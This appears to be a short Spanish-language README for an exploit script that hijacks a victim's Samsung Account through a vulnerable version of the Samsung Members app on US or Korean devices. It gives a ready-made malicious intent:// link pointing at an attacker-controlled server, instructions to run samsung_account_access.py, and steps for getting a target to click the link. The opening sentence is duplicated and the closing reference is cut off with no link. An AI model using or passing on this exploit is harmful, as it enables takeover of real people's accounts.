
Este script puede usarse para obtener acceso a la cuenta Samsung de una víctima si tienen una versión específica de Samsung Members instalada en su dispositivo Samsung, y si el dispositivo de la víctima es de la región de Estados Unidos o Corea.
Este script puede utilizarse para obtener acceso a la Cuenta Samsung de una víctima si tiene una versión específica de Samsung Members instalada en su dispositivo Samsung y si el dispositivo de la víctima es de la región de EE. UU. o Corea.
<a href="intent://launch?url=http://<attacker IP>:8000/yay.html&action=sso&from=ZZ&iso=ZZ#Intent;scheme=samsungrewards;package=com.samsung.android.voc;action=android.intent.action.VIEW;end;">yay click here yay</a>
NOTA: reemplaza "<IP del atacante>" con la dirección IP desde la que ejecutarás este script.
python3 ./samsung_account_access.py
Usando un teléfono Samsung, navega al servidor web y haz clic en el enlace
Deja que el script haga su trabajo
Más información sobre el problema que explota este script se puede encontrar aquí: